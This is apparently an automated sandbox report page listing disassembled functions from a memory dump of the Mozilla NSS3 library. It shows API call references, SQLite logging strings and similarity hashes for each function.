Instruction Fuzzy Hash: BAC17EB1A01229DBDB10DF25CC80BDAB7F4BB48318F1442A9E948A7741E775EE95CF90

Function 6C57DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C5897C1,?,00000000,00000000,?,?,?,00000000,?,6C567F4A,00000000), ref: 6C57DC68

Part of subcall function 6C5A0BE0: malloc.MOZGLUE(6C598D2D,?,00000000,?), ref: 6C5A0BF8
Part of subcall function 6C5A0BE0: TlsGetValue.KERNEL32(6C598D2D,?,00000000,?), ref: 6C5A0C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C567F4A,00000000,?,00000000,00000000), ref: 6C57DD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C567F4A,00000000,?,00000000,00000000), ref: 6C57DE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C567F4A,00000000,?,00000000,00000000), ref: 6C57DE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C567F4A,00000000,?,00000000,00000000), ref: 6C57DE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C567F4A,00000000,?,00000000,00000000), ref: 6C57DF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C567F4A,00000000,?,00000000,00000000), ref: 6C57DF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C567F4A,00000000,?,00000000,00000000), ref: 6C57DF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C567F4A,00000000,?,00000000,00000000), ref: 6C57DFAA

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: 382d4f8dd3bb40d558451f18e2e46a664073f3eb8615afde04fdddb94784dd25
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: 8981C6716065058BFB368E5ACC9076D72D6DBA0388F20883ADD1ACAFD1D774D8C4C632

Function 6C553C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C553C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6C553C94

Part of subcall function 6C5495B0: TlsGetValue.KERNEL32(00000000,?,6C5600D2,00000000), ref: 6C5495D2
Part of subcall function 6C5495B0: EnterCriticalSection.KERNEL32(?,?,?,6C5600D2,00000000), ref: 6C5495E7
Part of subcall function 6C5495B0: PR_Unlock.NSS3(?,?,?,?,6C5600D2,00000000), ref: 6C549605

PORT_NewArena_Util.NSS3(00000800), ref: 6C553CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C553CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C553CE1

Part of subcall function 6C553090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C56AE42), ref: 6C5530AA
Part of subcall function 6C553090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5530C7
Part of subcall function 6C553090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5530E5
Part of subcall function 6C553090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C553116
Part of subcall function 6C553090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C55312B
Part of subcall function 6C553090: PK11_DestroyObject.NSS3(?,?), ref: 6C553154
Part of subcall function 6C553090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C55317E

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: c9d23e624a530656d05d080d6f7cc139b200430a0a0abaa5d87e147aa74ea2cc
Instruction ID: 69a68d8c8d7017f24c34f563980c51b7c42150ea6bde91f3f6cf1396605b3802
Opcode Fuzzy Hash: c9d23e624a530656d05d080d6f7cc139b200430a0a0abaa5d87e147aa74ea2cc
Instruction Fuzzy Hash: 1661C875B00200ABEB105F66DC41FAB7AF9EF44748F884429FD4A9AA52F721DD24C7A1

Function 6C593D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6C593440: PK11_GetAllTokens.NSS3 ref: 6C593481
Part of subcall function 6C593440: PR_SetError.NSS3(00000000,00000000), ref: 6C5934A3
Part of subcall function 6C593440: TlsGetValue.KERNEL32 ref: 6C59352E
Part of subcall function 6C593440: EnterCriticalSection.KERNEL32(?), ref: 6C593542
Part of subcall function 6C593440: PR_Unlock.NSS3(?), ref: 6C59355B

TlsGetValue.KERNEL32 ref: 6C593D8B
EnterCriticalSection.KERNEL32(?), ref: 6C593D9F
PR_Unlock.NSS3(?), ref: 6C593DCA
PR_SetError.NSS3(00000000,00000000), ref: 6C593DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C593E4F

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

TlsGetValue.KERNEL32 ref: 6C593E97
EnterCriticalSection.KERNEL32(?), ref: 6C593EAB
PR_Unlock.NSS3(?), ref: 6C593ED6
PR_SetError.NSS3(00000000,00000000), ref: 6C593EEE

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: e287a576359d98bacfe6557c62c8dafd7f2e56b214a0453584eb0f810b498137
Instruction ID: 248487fb8360f1efa417ca4b5a1abbfa18aa1dfb47371cf1d013cca1f03da3b4
Opcode Fuzzy Hash: e287a576359d98bacfe6557c62c8dafd7f2e56b214a0453584eb0f810b498137
Instruction Fuzzy Hash: F2512572A00241DFDB11AF6ADC84B6A77B4EF85318F1505A8DE0D4BB22EB31E954CBD1

Function 6C542C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(5683EA68), ref: 6C542C5D

Part of subcall function 6C5A0D30: calloc.MOZGLUE ref: 6C5A0D50
Part of subcall function 6C5A0D30: TlsGetValue.KERNEL32 ref: 6C5A0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C542C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C542CE0

Part of subcall function 6C542E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C542CDA,?,00000000), ref: 6C542E1E
Part of subcall function 6C542E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C542E33
Part of subcall function 6C542E00: TlsGetValue.KERNEL32 ref: 6C542E4E
Part of subcall function 6C542E00: EnterCriticalSection.KERNEL32(?), ref: 6C542E5E
Part of subcall function 6C542E00: PL_HashTableLookup.NSS3(?), ref: 6C542E71
Part of subcall function 6C542E00: PL_HashTableRemove.NSS3(?), ref: 6C542E84
Part of subcall function 6C542E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C542E96
Part of subcall function 6C542E00: PR_Unlock.NSS3 ref: 6C542EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C542D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C542D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C542D3F
free.MOZGLUE(00000000), ref: 6C542D73
CERT_DestroyCertificate.NSS3(?), ref: 6C542DB8
free.MOZGLUE ref: 6C542DC8

Part of subcall function 6C543E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C543EC2
Part of subcall function 6C543E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C543ED6
Part of subcall function 6C543E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C543EEE
Part of subcall function 6C543E60: PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0), ref: 6C543F02
Part of subcall function 6C543E60: PL_FreeArenaPool.NSS3 ref: 6C543F14
Part of subcall function 6C543E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C543F27

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 9984e569ad95a409d68c46b1c6751a3f943d26eef9f88807f0c79b1be806dfba
Instruction ID: a73d8daa728634f8302de383399f2746082fec97ea33ca42cd891527ad9e6535
Opcode Fuzzy Hash: 9984e569ad95a409d68c46b1c6751a3f943d26eef9f88807f0c79b1be806dfba
Instruction Fuzzy Hash: C851D171A043219BDB01DF69DC89B5B77E5EF94348F14882CEC59C3650E731E816CB92

Function 6C547CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5440D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C543F7F,?,00000055,?,?,6C541666,?,?), ref: 6C5440D9
Part of subcall function 6C5440D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C541666,?,?), ref: 6C5440FC
Part of subcall function 6C5440D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C541666,?,?), ref: 6C544138

PR_GetCurrentThread.NSS3 ref: 6C547CFD

Part of subcall function 6C609BF0: TlsGetValue.KERNEL32(?,?,?,6C650A75), ref: 6C609C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6C669030), ref: 6C547D1B

Part of subcall function 6C59FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C541A3E,00000048,00000054), ref: 6C59FD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6C669048), ref: 6C547D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C547D50
PR_GetCurrentThread.NSS3 ref: 6C547D61
PORT_ArenaMark_Util.NSS3(?), ref: 6C547D7D
free.MOZGLUE(?), ref: 6C547D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C547DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C547E19

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: 0a307efde358ef9f6b56c759013ac3c643225efe2d7595d8b10e9815b6bb40ac
Instruction ID: 2d9d98ae2191a6e3ea8d2b009991d57bb311f40b2e9cc4641e71494c4618c8c1
Opcode Fuzzy Hash: 0a307efde358ef9f6b56c759013ac3c643225efe2d7595d8b10e9815b6bb40ac
Instruction Fuzzy Hash: 6C412572A0011A9BDB008F699C41BAF33E4AF8039CF054174EC19ABB51E730ED19CBE5

Function 6C557EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?,00000000,00000000,?,?,?,6C5580DD), ref: 6C557F15
DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6C5580DD), ref: 6C557F36
free.MOZGLUE(?,?,?,6C5580DD), ref: 6C557F3D
SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6C5580DD), ref: 6C557F5D
DeleteCriticalSection.KERNEL32(?,6C5580DD), ref: 6C557F94
free.MOZGLUE(?), ref: 6C557F9B
PR_SetError.NSS3(FFFFE08B,00000000,6C5580DD), ref: 6C557FD0
PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6C5580DD), ref: 6C557FE6
free.MOZGLUE(?,6C5580DD), ref: 6C55802D

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
String ID:
API String ID: 4037168058-0
Opcode ID: a21d5fab93cb50079c68a35a84993c8d37b7480cec08d39eab76ce801d6b7ef8
Instruction ID: 56306cb2812b11f1d329e61dfe8fd7dee40589e997fddb6a2c1ad36d01d2a6ce
Opcode Fuzzy Hash: a21d5fab93cb50079c68a35a84993c8d37b7480cec08d39eab76ce801d6b7ef8
Instruction Fuzzy Hash: 5641E5B1B412009BDB00DFFBACC8A4E7775BB86358F40412AE61A83B40D731AC15CB99

Function 6C59FEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C59FF00

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

PORT_ArenaMark_Util.NSS3(?), ref: 6C59FF18
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C59FF26
PORT_ArenaMark_Util.NSS3(?), ref: 6C59FF4F
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C59FF7A
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C59FF8C

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
String ID:
API String ID: 1233137751-0
Opcode ID: 2446a4a39634a944df2f1f50a8a124208a9dd123af61655624e10d4506bf8308
Instruction ID: d12c307319473b123f9c11c6a08b10d22b6f2a4ecde04d96736937c9fac2dead
Opcode Fuzzy Hash: 2446a4a39634a944df2f1f50a8a124208a9dd123af61655624e10d4506bf8308
Instruction Fuzzy Hash: D73124B69013929BE7108EAA8C40B5F76E8AF86348F140279FD1A97B40E731D915C7D1

Function 6C4E7D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4E7E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4E7E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C4E7EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4E7F2E

Strings

%s at line %d of [%.10s], xrefs: 6C4E7EE7, 6C4E7F28
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4E7ED8, 6C4E7F08, 6C4E7F19
database corruption, xrefs: 6C4E7EE2, 6C4E7F23

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 92bb76eed1301b8d2f541708ab9832b62e173f8ecfd45be927cdeaa1da0b48e6
Instruction ID: 9be48b82edbc5127bc5236d136cc59106bcb298b558eb08363bfca73d6744aa9
Opcode Fuzzy Hash: 92bb76eed1301b8d2f541708ab9832b62e173f8ecfd45be927cdeaa1da0b48e6
Instruction Fuzzy Hash: 0761C474B082059FDB05CF69C880F6A3772BF49329F1649A8EC094BB52D731EC56CBA5

Function 6C4CFCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4CFD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4CFD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C4CFE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C4CFE83

Part of subcall function 6C4CFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C4CFEFA
Part of subcall function 6C4CFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C4CFF3B

Strings

%s at line %d of [%.10s], xrefs: 6C4CFD73, 6C4CFE35
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4CFD64, 6C4CFE26
database corruption, xrefs: 6C4CFD6E, 6C4CFE30

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: c61ce610dedec7b914f9cecd6f41954cc1d9be468f69b40624e3d413e337faf7
Instruction ID: 0c45c986dc0786819e0cebfa73d2fcee63b6338619df38adf19a16f2a5dcf0cf
Opcode Fuzzy Hash: c61ce610dedec7b914f9cecd6f41954cc1d9be468f69b40624e3d413e337faf7
Instruction Fuzzy Hash: 9F518175B012059FDB04CFA9C890EAEB7B1FF48308F144469E906AB762E735EC51CBA5

Function 6C612F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C612FFD
sqlite3_initialize.NSS3 ref: 6C613007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C613032
sqlite3_mprintf.NSS3(6C67AAF9,?), ref: 6C613073
sqlite3_free.NSS3(?), ref: 6C6130B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C6130C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C6130BB

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 945f41b6a70d5666e86c6cb6d3eb5526d9983edc826e7b330fe15d1e8d85eb46
Instruction ID: c7448d6faccebd66dcbc87f59e725e2b75e45d26f402cf0231575ae3054413dd
Opcode Fuzzy Hash: 945f41b6a70d5666e86c6cb6d3eb5526d9983edc826e7b330fe15d1e8d85eb46
Instruction Fuzzy Hash: D841AF71604A06AFDB00CF29D840A8AB7E5FF4436AF148638EC1A87B40E731F995CBD5

Function 6C595ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(q]Yl), ref: 6C595F0A
TlsGetValue.KERNEL32 ref: 6C595F1F
EnterCriticalSection.KERNEL32(89000904), ref: 6C595F2F
PR_Unlock.NSS3(890008E8), ref: 6C595F55
PR_SetError.NSS3(00000000,00000000), ref: 6C595F6D
SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6C595F7D

Part of subcall function 6C595220: TlsGetValue.KERNEL32(00000000,890008E8,?,6C595F82,8B4274C0), ref: 6C595248
Part of subcall function 6C595220: EnterCriticalSection.KERNEL32(0F6C660D,?,6C595F82,8B4274C0), ref: 6C59525C
Part of subcall function 6C595220: PR_SetError.NSS3(00000000,00000000), ref: 6C59528E
Part of subcall function 6C595220: PR_Unlock.NSS3(0F6C65F1), ref: 6C595299
Part of subcall function 6C595220: free.MOZGLUE(00000000), ref: 6C5952A9

Strings

q]Yl, xrefs: 6C595EDB, 6C595F09

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

